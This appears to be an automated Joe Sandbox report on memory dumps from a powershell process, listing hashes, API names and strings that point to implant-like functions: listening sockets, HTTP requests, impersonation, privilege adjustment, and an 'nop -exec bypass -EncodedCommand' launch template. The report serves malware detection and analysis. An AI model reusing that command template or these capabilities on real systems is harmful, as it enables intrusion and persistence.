                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                    • String ID: $@
                                                    • API String ID: 3318157856-1077428164
                                                    • Opcode ID: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                                                    • Instruction ID: c879a5fc215cf7d9df5593d13273af5666b518eaad1d7d80c893318b3729fdd5
                                                    • Opcode Fuzzy Hash: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                                                    • Instruction Fuzzy Hash: DF52D063608684A6FF658E95B74C36EEBA0B749794F161105DA461EFF8DF3CC840EB02
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                    • String ID:
                                                    • API String ID: 3318157856-3916222277
                                                    • Opcode ID: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                                                    • Instruction ID: 8bb7cd7269f5435c1d3f87f4262a6a6b68eccd93a1a244ab569c9d4302a02333
                                                    • Opcode Fuzzy Hash: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                                                    • Instruction Fuzzy Hash: 3152DE33608686A6FF658E94B7483AE6BA4B74D794F261005DA461FFF5DF7CC840AB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                    • String ID: $@
                                                    • API String ID: 3318157856-1077428164
                                                    • Opcode ID: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                                                    • Instruction ID: ff49ecf7092227870cad29336f63db43e7eaa423e166d2def8b7610ed3d097c7
                                                    • Opcode Fuzzy Hash: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                                                    • Instruction Fuzzy Hash: FD52F322708684A6FF75CB95D76CB6E7BA0BB65784F164105DEC607EE4DB38C840EB08
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$Locale_invalid_parameter_noinfo$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexitwrite_multi_charwrite_string
                                                    • String ID: -$0
                                                    • API String ID: 3246410048-417717675
                                                    • Opcode ID: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                                                    • Instruction ID: 074ed1d1f12d8d1cc4758e7cca6151a4dde977d87e02543c6598768d7250f553
                                                    • Opcode Fuzzy Hash: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                                                    • Instruction Fuzzy Hash: EE420362708A94A6FF74CBD5D76CB7E6BA8B761780F160005DEC606ED4DB39D840EB08

                                                    Control-flow Graph

                                                    Control-flow graph (rendered graph and its executed/not-executed colour legend not reproduced; only the recoverable summary is kept): basic blocks from 22ef9b35914 through 22ef9b3604f, entered at 22ef9b35914-22ef9b3595c. The graph contains only calls to internal addresses within the same image; no named Windows API appears in it.
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                    • String ID: U
                                                    • API String ID: 3902385426-4171548499
                                                    • Opcode ID: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                                                    • Instruction ID: 769a17ffd5e4cc9a8da3852ef1351304eb9bd3c732eaee80aeb11cea0f8dad71
                                                    • Opcode Fuzzy Hash: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                                                    • Instruction Fuzzy Hash: CA120832318641A6EF30CFA8D5AC79E77A0F7A4758F520116DACD43E94DB7AC445EB08

                                                    Control-flow Graph

                                                    Control-flow graph (rendered graph and its executed/not-executed colour legend not reproduced; only the recoverable summary is kept): basic blocks from 22efa0c7b38 through 22efa0c83c3, entered at 22efa0c7b38-22efa0c7bad. The graph contains only calls to internal addresses within the same image; no named Windows API appears in it.
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                    • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                                                    • API String ID: 3442832105-1222817042
                                                    • Opcode ID: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                                                    • Instruction ID: 448c598577a7d517654325d1462a37e202ee1a50cf5d25115a5d6ccde123e6e7
                                                    • Opcode Fuzzy Hash: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                                                    • Instruction Fuzzy Hash: 9D42C762614E84A2EE258B69F1453E8A3B0FF9C799F055101DF891BF71EB3CD1A6E340

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                                                    • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                                                    • API String ID: 723279517-1754256099
                                                    • Opcode ID: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                                                    • Instruction ID: e15ee332dafd4a51bf167758841f31a1f73406edc933e7fa286befec57257806
                                                    • Opcode Fuzzy Hash: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                                                    • Instruction Fuzzy Hash: 0B61B072304751A6EF14DBA1F59829DA3A1F78CB80F414015EE494BFA9EF7CC605EB40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _snprintf$Internet$CloseHandleHttpRequeststrchr$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                                                    • String ID: %s%s$*/*
                                                    • API String ID: 3536628738-856325523
                                                    • Opcode ID: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                                                    • Instruction ID: 25c28d18f78e98b7ecba82cf1f25bf0136018bbeae2abe28f452bc7835139b49
                                                    • Opcode Fuzzy Hash: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                                                    • Instruction Fuzzy Hash: 01719122700B81A6EF109BA1F6987AA67A1F78CBD4F420112EE4D5BFA5DF3CC505E700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                    • String ID: nop -exec bypass -EncodedCommand "%s"$not create token: %d
                                                    • API String ID: 3442832105-3652497171
                                                    • Opcode ID: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                                                    • Instruction ID: 0233bbdf85a01739512684917093ddba419a92e3e8cd302048d752628e7d0e42
                                                    • Opcode Fuzzy Hash: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                                                    • Instruction Fuzzy Hash: BD42D561614E84A2EF378B69D1553E8A3A0FFA9759F015101DFC817F65EF38D2A2D308
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                                                    • String ID:
                                                    • API String ID: 3044875250-0
                                                    • Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                                                    • Instruction ID: faf235a36a2fec85977fc8bb3a4553c3029e4125144d56694c43528b04ef1748
                                                    • Opcode Fuzzy Hash: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                                                    • Instruction Fuzzy Hash: 1C717B32204B44E2EF209FA1F68835E63A1FB4CB84F124125DA494BFA5DF7CC495EB40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                                                    • String ID: %s\*
                                                    • API String ID: 2620626937-766152087
                                                    • Opcode ID: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                                                    • Instruction ID: 7af96dcc26320755320cbb0669f069870832c86b2448089441905ac21959ef2e
                                                    • Opcode Fuzzy Hash: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                                                    • Instruction Fuzzy Hash: 5C31ED1620068266EE159BE3BA183A97B61734EFD0F8A50519ED50FFF6DB3CC942B300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
                                                    • String ID: %s%s%s
                                                    • API String ID: 1671524875-1891519693
                                                    • Opcode ID: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                                                    • Instruction ID: 8a4a2eccfd361d19fdb1f4fbca8c265f0ca69a020293538bce29c8df7d9b8687
                                                    • Opcode Fuzzy Hash: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                                                    • Instruction Fuzzy Hash: 1141A22470424166FE08EBA2BB6C76E6791B78DBD0F4A4520BE554FFB6CE3CC442A700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: bindclosesockethtonsioctlsocketlistensocket
                                                    • String ID:
                                                    • API String ID: 1767165869-0
                                                    • Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                                                    • Instruction ID: 58a76cfdcf491228b2565e4196740bc7a354a7b8d83289d6d72ca2cd0b6e6305
                                                    • Opcode Fuzzy Hash: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                                                    • Instruction Fuzzy Hash: 02210222304754A2EF208F86F658219A7A0F38CFA4F465624EE5A0BFB0CB3CC445AB00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                                                    • String ID:
                                                    • API String ID: 3910169428-0
                                                    • Opcode ID: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                                                    • Instruction ID: 906cb0c793f7a0132899446ecd1a280b114b3057945957d12f778d296e1337be
                                                    • Opcode Fuzzy Hash: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                                                    • Instruction Fuzzy Hash: 7121AE26210B40A2EF249F61F6583993760F78CBA4F5252259E5947FE0DE3CC94AE700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
                                                    • String ID: %s\%s
                                                    • API String ID: 3621627092-4073750446
                                                    • Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                                                    • Instruction ID: 2eb07a27f38bd4bea119fbee2442464b1411b042be60441926de1021ebbc0e0b
                                                    • Opcode Fuzzy Hash: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                                                    • Instruction Fuzzy Hash: 27413F20314745A1FF00EBA2FAAD35A63A1E78DBC4F550025A94D5FFB6DE3CC546A740
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountSleepTick$closesocket
                                                    • String ID:
                                                    • API String ID: 2363407838-0
                                                    • Opcode ID: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                                                    • Instruction ID: 3f7bd66fb12823eb6d83d45480e0831ba9567106b04dcc9a70ef3062cf7f7ca5
                                                    • Opcode Fuzzy Hash: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                                                    • Instruction Fuzzy Hash: 5F21A72170464461EE20ABA2F65825E6350B78DBE0F464721FDBA8BFF6DE3CC545A701
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: bindclosesockethtonslistensocket
                                                    • String ID:
                                                    • API String ID: 564772725-0
                                                    • Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                                                    • Instruction ID: 721c30efaa2644c7706737280ca2dfb9bd3ccb10a411cd0e561b56641a564476
                                                    • Opcode Fuzzy Hash: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                                                    • Instruction Fuzzy Hash: D611032260475492EE20AF91FA2921AB360F78CFE0F060625EE991BFF4CF7CC105A704
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                    • String ID: %s
                                                    • API String ID: 4244140340-620797490
                                                    • Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                                                    • Instruction ID: db78b00591234d7f65bf2b2182812bdab3e8bcfb6942e21dbdd3b88b03e44df6
                                                    • Opcode Fuzzy Hash: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                                                    • Instruction Fuzzy Hash: 6F215972B00B00A9FB149FA1E5587AC73A5B758B88F4544168E4C9BFA9EF78C614E380
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTick$ErrorLastSleepioctlsocket
                                                    • String ID:
                                                    • API String ID: 1121440892-0
                                                    • Opcode ID: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                                                    • Instruction ID: 06b3f1a4c6b6441d7042562ec7da67ca6a0c3289ef082e8886a8d60e10864c25
                                                    • Opcode Fuzzy Hash: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                                                    • Instruction Fuzzy Hash: 42316B36B00B40A6EF10DBA2E5982AC73B9F38CB90F520626DE5D97FA5DE38C515D340
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                                                    • String ID:
                                                    • API String ID: 1212816094-0
                                                    • Opcode ID: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                                                    • Instruction ID: 271d3b911519cfe8377cf5d78d87161fd3c89ab4e87e25807eeb7a65bf11e530
                                                    • Opcode Fuzzy Hash: 092ee1049558447ca0759a62b312a2f8f202331ccdb130be8b8fda5f5e098b35
                                                    • Instruction Fuzzy Hash: 3DF0212631464453EF548BB5F5C975A53A0D78C790F565425FA0B4AF74CE3CC444AB00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
